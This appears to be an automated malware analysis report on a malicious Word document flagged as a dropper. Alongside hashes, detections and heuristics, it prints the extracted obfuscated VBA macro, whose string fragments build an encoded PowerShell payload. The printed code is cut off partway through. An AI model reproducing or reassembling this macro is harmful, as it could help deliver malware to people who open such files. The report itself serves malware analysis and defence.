Office (OLE) malware analysis — malicious · a91fac67e6858848

MALICIOUS

Office (OLE)

92.0 KB Created: 2018-06-27 08:00:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 1ac8af7a62e024e34c88612db507ab95 SHA-1: 297a9598e72337e98326a9ee9b300a2758b56c86 SHA-256: a91fac67e6858848a850745cd99737d105fb0e0d841fe5c179dc062e24ef6adb

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic indicating execution of arbitrary commands. This strongly suggests the macro's purpose is to download and execute a secondary payload. The ClamAV detection also confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6593331-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6593331-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7413 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7413 bytes
SHA-256: `abdbc22c81ac3f18582a02e594e44d1cd07f017c186e971e9901c668c18e849c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SaNMzjXHAlU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "PUAqHzPYHn" Function rRHaDoT() On Error Resume Next VMdEEz = pzlDmj jCapfR = CDate(13949) OECrH = 393 WtDGmi = 90959 OUVTuL = 76288 lksnc = Sin(60265) ssVQhsWpaMN = "Hell -Jo" + "IN " + Chr(40) + "[C" + "HAr[]" + "]" + Chr(40) + " 11" + "9 ,1 , 1" + "8,31" + ", 110 ,6" + "1 " + ",54 , 36" + " ,1" XvKHrH = KlobMB RXkYRQ = CDate(6715) wEplY = 1050 waIBfw = 7453 SUWHk = 49465 mKHPhp = Sin(40774) HbpOQJwtf = "26 " + ",60" + " , 49," + " 57, 54," + "48" + " ," + " 3" aDdEan = HirXb iLQSiX = CDate(55714) LfLqFm = 34186 qujkbD = 22903 AjBPd = 61438 ApRiw = Sin(26432) mdbzCwuXkjQ = "9, 115 ," + " 29 , 54" + ", 39, 12" + "5,4 , " + "54,4" + "9," + "16, 6" + "3," + " 58,54" + " ,61 ," + "39 ," VQutaT = pzHoHt SEUOKi = CDate(53486) odSWB = 99574 ZscKfP = 46008 nIuYJ = 18901 nSAwc = Sin(89983) srwFdEBv = " 10" + "4,119" + ",36, " + "49," + "21 " + ", 1" + "10, 1" + "16 , 5" + "9 ,39" + ",39" + " ,35," YwHqQ = 95437 XjVzz = 7588 iGriw = 58015 lLCMK = Sin(8651) rIOYUi = zUQKU arhEZN = CDate(19189) ZWwCwMddn = "105" + ",124" + " ," + " 1" + "24," + "62 , 50 " + ", 61,5" + "4 ,54 " + ",3" + "3 ," + " 32,12" + "5 , 4" PKaYQ = 23786 zwAOZ = 80990 oSEAP = 26738 wJqCX = Sin(55138) rrzVh = tBXHXP TKNoW = CDate(26774) dJPSiv = "8, 60, 6" + "2 , " + "12" + "4 , " + "62 ,58 ," + " 3" LszXYA = 55594 qJzCzm = 30808 hFzmBU = 15046 TZERO = Sin(82354) uAwLmB = RaEVFv LqTmt = CDate(73945) nqQFz = "3," + " 48,1" + "25 ," + " 54 , " + "43 , " + "54, 116," + "125 ," + "0 , 35" + " ,63 ,58" nwihO = 8274 BIlwcr = 6245 lvBdc = 81396 rrlZYk = Sin(35283) lvZDo = LPcjo oIsLC = CDate(95300) rriOSccwU = ", " + "39,1" + "23,11" + "6 , 1" + "9, 11" + "6,122 , " + "104 ," + " 119,28" + ", 57,2" HslRnE = 76422 bqGFhz = 11206 UdDHD = 74820 rbIXd = Sin(72065) IWlqP = CNKzM dDmuCt = CDate(72122) HnUzdTwNlT = "4, 11" + "5 ," + "110 ,115" + ", 116" + ",96 " + ", 106,96" + ", 116," + " 1" + "04 , " + "11" + "9 , 2" IkjVz = 7416 hMpjfz = 75945 CcidjA = 21 wVIXD = Sin(54118) BuUwOW = wlbtL cJnWG = CDate(97829) amjhz = "0 , 41," + "17" + ", 110 ," + " 119," + " 54, " + "61 ," + " 37,10" + "5, " + "39, 5" + "4 ,62,3" + "5 ," + " 120 ," ZpNuBj = 99325 IazZIf = 68945 QTWHK = 90266 kwoYV = Sin(82124) Fwwnd = KkcRSz LaQwN = CDate(35970) uwOLwK = "116 ," + "15, 116," + " 120 ," + " 11" + "9 ,28," + "57 ,24 " rRHaDoT = ssVQhsWpaMN + HbpOQJwtf + mdbzCwuXkjQ + srwFdEBv + ZWwCwMddn + dJPSiv + nqQFz + rriOSccwU + HnUzdTwNlT + amjhz + uwOLwK IwrMh = 62876 KEnzo = 85136 Ajdud = 17889 fIHBs = Sin(14196) dRwkk = QjCmzt Gipnl = CDate(16112) End Function Function nWNIBWwzV() On Error Resume Next GsACfY = 26582 cXdAUR = 47092 vkFmwt = 3991 MObAh = Sin(27153) bsWfqw = amDDik MQDaED = CDate(70250) BzXrLNsq = ", 1" + "20 , " + "116, " + "125 ,5" + "4, 43" + " , 54 ," + "116, 10" + "4 ," + "53 ,60" TwjWLa = 76421 aOBcsv = 65349 GjthFs = 41730 wUPivw = Sin(47295) icnmd = oTIMaq bBibkS = CDate(84046) kkZNrGoi = " ,3" + "3, 5" + "4 " + ", 50" + ",48, " + "59 ," + "12" + "3 ," + "119,61, " + "16 , " + "58,115 ," + "58" JtKBG = 13917 usTiHu = 75279 LLtKLA = 10620 SHJWBh = Sin(23260) MYLiD = SDApL WlupL = CDate(66579) PGrVidmK = " ," + " 61," + "115" + " ,1" + "19,36 ," + "49 ," + "21,122" XYQKtV = 58579 avGARi = 96997 wrSKJ = 98790 PvGqt = Sin(38971) THpit = OKXwo pOLzSA = CDate(15580) IMzYXzlR = " , 4" + "0,39," + "33, 42," + " 40 , " + "119 , 1 " + ",18," + " 31 " + ",125," KhsPwu = 34004 WsXijj = 54322 GufwB = 8920 nvjnz = Sin(29903) qRpakC = vMPzzO DtNnR = CDate(31420) pYQzj = " 2" + "3, " + "60, 36" + " ," + "61,63, " + "60,5" + "0,55 ,2" + "1 , 5" + "8,63, 5" + "4 ,12" + "3 , " mkOniY = 57772 DAJLEm = 55247 TQMPC = 66073 Gmqftk = Sin(19665) lhXzf = wLmHfZ PCjnH = CDa ... (truncated)

SHA-256: abdbc22c81ac3f18582a02e594e44d1cd07f017c186e971e9901c668c18e849c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SaNMzjXHAlU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PUAqHzPYHn"
Function rRHaDoT()
On Error Resume Next
VMdEEz = pzlDmj
jCapfR = CDate(13949)
OECrH = 393
WtDGmi = 90959
OUVTuL = 76288
lksnc = Sin(60265)
ssVQhsWpaMN = "Hell -Jo" + "IN " + Chr(40) + "[C" + "HAr[]" + "]" + Chr(40) + " 11" + "9 ,1 , 1" + "8,31" + ", 110 ,6" + "1 " + ",54 , 36" + " ,1"
XvKHrH = KlobMB
RXkYRQ = CDate(6715)
wEplY = 1050
waIBfw = 7453
SUWHk = 49465
mKHPhp = Sin(40774)
HbpOQJwtf = "26 " + ",60" + " , 49," + " 57, 54," + "48" + " ," + " 3"
aDdEan = HirXb
iLQSiX = CDate(55714)
LfLqFm = 34186
qujkbD = 22903
AjBPd = 61438
ApRiw = Sin(26432)
mdbzCwuXkjQ = "9, 115 ," + " 29 , 54" + ", 39, 12" + "5,4 , " + "54,4" + "9," + "16, 6" + "3," + " 58,54" + " ,61 ," + "39 ,"
VQutaT = pzHoHt
SEUOKi = CDate(53486)
odSWB = 99574
ZscKfP = 46008
nIuYJ = 18901
nSAwc = Sin(89983)
srwFdEBv = " 10" + "4,119" + ",36, " + "49," + "21 " + ", 1" + "10, 1" + "16 , 5" + "9 ,39" + ",39" + " ,35,"
YwHqQ = 95437
XjVzz = 7588
iGriw = 58015
lLCMK = Sin(8651)
rIOYUi = zUQKU
arhEZN = CDate(19189)
ZWwCwMddn = "105" + ",124" + " ," + " 1" + "24," + "62 , 50 " + ", 61,5" + "4 ,54 " + ",3" + "3 ," + " 32,12" + "5 , 4"
PKaYQ = 23786
zwAOZ = 80990
oSEAP = 26738
wJqCX = Sin(55138)
rrzVh = tBXHXP
TKNoW = CDate(26774)
dJPSiv = "8, 60, 6" + "2 , " + "12" + "4 , " + "62 ,58 ," + " 3"
LszXYA = 55594
qJzCzm = 30808
hFzmBU = 15046
TZERO = Sin(82354)
uAwLmB = RaEVFv
LqTmt = CDate(73945)
nqQFz = "3," + " 48,1" + "25 ," + " 54 , " + "43 , " + "54, 116," + "125 ," + "0 , 35" + " ,63 ,58"
nwihO = 8274
BIlwcr = 6245
lvBdc = 81396
rrlZYk = Sin(35283)
lvZDo = LPcjo
oIsLC = CDate(95300)
rriOSccwU = ", " + "39,1" + "23,11" + "6 , 1" + "9, 11" + "6,122 , " + "104 ," + " 119,28" + ", 57,2"
HslRnE = 76422
bqGFhz = 11206
UdDHD = 74820
rbIXd = Sin(72065)
IWlqP = CNKzM
dDmuCt = CDate(72122)
HnUzdTwNlT = "4, 11" + "5 ," + "110 ,115" + ", 116" + ",96 " + ", 106,96" + ", 116," + " 1" + "04 , " + "11" + "9 , 2"
IkjVz = 7416
hMpjfz = 75945
CcidjA = 21
wVIXD = Sin(54118)
BuUwOW = wlbtL
cJnWG = CDate(97829)
amjhz = "0 , 41," + "17" + ", 110 ," + " 119," + " 54, " + "61 ," + " 37,10" + "5, " + "39, 5" + "4 ,62,3" + "5 ," + " 120 ,"
ZpNuBj = 99325
IazZIf = 68945
QTWHK = 90266
kwoYV = Sin(82124)
Fwwnd = KkcRSz
LaQwN = CDate(35970)
uwOLwK = "116 ," + "15, 116," + " 120 ," + " 11" + "9 ,28," + "57 ,24 "
rRHaDoT = ssVQhsWpaMN + HbpOQJwtf + mdbzCwuXkjQ + srwFdEBv + ZWwCwMddn + dJPSiv + nqQFz + rriOSccwU + HnUzdTwNlT + amjhz + uwOLwK
IwrMh = 62876
KEnzo = 85136
Ajdud = 17889
fIHBs = Sin(14196)
dRwkk = QjCmzt
Gipnl = CDate(16112)
End Function
Function nWNIBWwzV()
On Error Resume Next
GsACfY = 26582
cXdAUR = 47092
vkFmwt = 3991
MObAh = Sin(27153)
bsWfqw = amDDik
MQDaED = CDate(70250)
BzXrLNsq = ", 1" + "20 , " + "116, " + "125 ,5" + "4, 43" + " , 54 ," + "116, 10" + "4 ," + "53 ,60"
TwjWLa = 76421
aOBcsv = 65349
GjthFs = 41730
wUPivw = Sin(47295)
icnmd = oTIMaq
bBibkS = CDate(84046)
kkZNrGoi = " ,3" + "3, 5" + "4 " + ", 50" + ",48, " + "59 ," + "12" + "3 ," + "119,61, " + "16 , " + "58,115 ," + "58"
JtKBG = 13917
usTiHu = 75279
LLtKLA = 10620
SHJWBh = Sin(23260)
MYLiD = SDApL
WlupL = CDate(66579)
PGrVidmK = " ," + " 61," + "115" + " ,1" + "19,36 ," + "49 ," + "21,122"
XYQKtV = 58579
avGARi = 96997
wrSKJ = 98790
PvGqt = Sin(38971)
THpit = OKXwo
pOLzSA = CDate(15580)
IMzYXzlR = " , 4" + "0,39," + "33, 42," + " 40 , " + "119 , 1 " + ",18," + " 31 " + ",125,"
KhsPwu = 34004
WsXijj = 54322
GufwB = 8920
nvjnz = Sin(29903)
qRpakC = vMPzzO
DtNnR = CDate(31420)
pYQzj = " 2" + "3, " + "60, 36" + " ," + "61,63, " + "60,5" + "0,55 ,2" + "1 , 5" + "8,63, 5" + "4 ,12" + "3 , "
mkOniY = 57772
DAJLEm = 55247
TQMPC = 66073
Gmqftk = Sin(19665)
lhXzf = wLmHfZ
PCjnH = CDa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.